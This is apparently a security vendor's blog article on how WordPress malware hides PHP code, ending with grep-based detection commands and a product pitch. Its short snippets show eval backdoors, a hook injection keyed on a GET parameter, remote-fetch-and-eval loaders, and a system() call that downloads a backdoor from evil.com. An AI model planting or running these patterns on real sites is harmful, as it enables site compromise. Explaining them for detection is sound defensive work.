If WordPress malware was obvious, it wouldn't survive long. The reason some infections persist for months is that attackers invest significant effort in making their code look legitimate — or invisible entirely.
Why obfuscation works
Most WordPress security scanners rely on signature matching — comparing file contents against a database of known malware strings. Obfuscation defeats this by transforming the malicious code so it doesn't match any known signature, while still executing the same payload at runtime. This is why real-time malware detection that goes beyond signatures is essential.
Technique 1: Base64 encoding
The most basic and still most common technique:
// What the scanner sees:
eval(base64_decode('ZWNobyAnSGVsbG8gV29ybGQnOw=='));
// What actually executes:
echo 'Hello World';
In practice, the decoded payload is a webshell, backdoor, or spam injector — not "Hello World."
Detection: WO Security Shield flags any eval(base64_decode(...)) pattern as suspicious, regardless of the encoded content. Legitimate plugins almost never use this pattern. These encoded payloads are commonly found in PHP backdoors.
Technique 2: String concatenation
Breaking function names into fragments to avoid keyword detection:
$a = 'base'.'64_'.'dec'.'ode';
$b = 'ev'.'al';
$b($a('bWFsaWNpb3VzX2NvZGU='));
No single string matches "base64_decode" or "eval" — but at runtime, they're reconstructed and executed.
Technique 3: Variable functions
PHP allows calling functions via variables, which hides the actual function being invoked:
$func = chr(101).chr(118).chr(97).chr(108); // "eval"
$func('malicious code here');
Or using array-based indirection:
$arr = array('', 'assert');
$arr[1]('system("whoami")');
Technique 4: Hex and octal encoding
// Hex encoding
$code = "\x65\x76\x61\x6c"; // "eval"
$code("malicious payload");
// Octal encoding
$func = "\145\166\141\154"; // "eval"
$func("malicious payload");
Technique 5: Compressed payloads
Using gzip compression to hide the actual code:
eval(gzinflate(base64_decode('eNpLSS0u0U...')));
The payload is compressed then base64-encoded. Scanners can't read the compressed content without decompressing it first.
Technique 6: Steganography — hiding code in images
The most sophisticated technique: embedding PHP code inside image files that pass basic validation.
// Legitimate-looking image include
$img = imagecreatefromjpeg('wp-content/uploads/2026/03/photo.jpg');
// But the EXIF data contains:
// <?php eval(base64_decode('...')); ?>
The PHP code is stored in EXIF metadata or appended after the image data. The file looks like a valid JPEG to image validators but contains executable code.
Technique 7: WordPress hook injection
Instead of standalone malicious files, attackers inject code into legitimate plugin files using WordPress hooks:
// Injected into a legitimate plugin's main file
add_action('init', function() {
if (isset($_GET['backdoor_key']) && $_GET['backdoor_key'] === 'secret') {
eval(base64_decode($_POST['cmd']));
}
});
This blends in with normal WordPress code patterns, making manual review difficult. File integrity monitoring catches these injections by comparing plugin files against their official versions.
How WO Security Shield detects obfuscated malware
- Pattern-based detection — We don't just match exact strings. We detect patterns: any combination of
eval+ encoding functions, regardless of how they're constructed - Entropy analysis — Obfuscated code has measurably higher entropy (randomness) than normal PHP code. High-entropy strings in PHP files are flagged for review
- File integrity comparison — Modified plugin/core files are compared against their official versions. Any injected code — obfuscated or not — shows up in the diff
- Behavioural signatures — We detect the structure of malicious code, not just its content. A function that reads POST data and passes it to eval() is flagged regardless of variable names
Obfuscation is an arms race, but the defender has one fundamental advantage: we know what legitimate WordPress code looks like. Anything that deviates from that pattern — especially in core files and popular plugins — deserves investigation. Scan your site now at wosecurity.com.
Advanced Obfuscation Techniques in 2026
Attackers are constantly developing new ways to hide malicious code. Here are the most common techniques we're seeing this year:
1. Variable Function Calls
Instead of calling dangerous functions directly, attackers store function names in variables:
// Direct call (easily detected):
eval(base64_decode($payload));
// Obfuscated version (harder to detect):
$a = 'base' . '64_de' . 'code';
$b = 'ev' . 'al';
$b($a($payload));
2. Character Code Construction
Building function names character by character:
// Constructs "system" from character codes
$func = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109);
$func('wget https://evil.com/backdoor.php -O /tmp/bd.php');
3. Steganographic Payloads
Malware hidden inside image files is increasingly common in 2026:
// The actual malware is encoded in the EXIF data of a JPEG file
$exif = exif_read_data('/wp-content/uploads/2026/01/photo.jpg');
eval(base64_decode($exif['ImageDescription']));
The image displays normally, so manual inspection won't catch it. The PHP code reads the EXIF metadata and executes it.
4. Database-Stored Payloads
Instead of storing malware in files (where file integrity monitoring catches it), attackers store the payload in the database:
// The loader is tiny and looks almost innocent
$opt = get_option('widget_text_settings');
if (isset($opt['code'])) { eval($opt['code']); }
The actual malicious code lives in the wp_options table, making it invisible to file-based scanners.
5. Legitimate Service Abuse
2026's most sophisticated malware uses legitimate services as command-and-control channels:
// Fetches commands from a public Pastebin URL
$cmd = file_get_contents('https://pastebin.com/raw/abc123');
// Or from a public GitHub gist
$cmd = file_get_contents('https://gist.githubusercontent.com/user/hash/raw/');
eval(base64_decode($cmd));
These requests look like normal outbound HTTP traffic because the destination is a legitimate, well-known service.
How to Detect Obfuscated Malware
Manual Detection Commands
# Find files using eval with any form of decoding
grep -rl "eval\s*(.*decode\|eval\s*(.*chr\|eval\s*(.*\$_" /var/www/html/wp-content/
# Find files with high entropy (indicates encoding/encryption)
find /var/www/html -name "*.php" -exec sh -c '
entropy=$(cat "{}" | base64 | wc -c)
filesize=$(wc -c < "{}")
ratio=$((entropy * 100 / (filesize + 1)))
if [ "$ratio" -gt 150 ]; then echo "HIGH ENTROPY: {}"; fi
' \;
# Find PHP files that read EXIF data (possible steganography)
grep -rl "exif_read_data\|getimagesize.*eval" /var/www/html/
WO Security Shield's Multi-Layer Approach
Our scanner uses four complementary detection methods:
- Signature matching — known malware patterns (catches 60% of threats)
- Heuristic analysis — suspicious code structures and function combinations (catches 25% more)
- File integrity comparison — diffs against official plugin/theme/core files (catches 10% more)
- Behavioural analysis — identifies code that performs suspicious actions regardless of obfuscation (catches the remaining 5%)
No single method catches everything — layered detection is essential.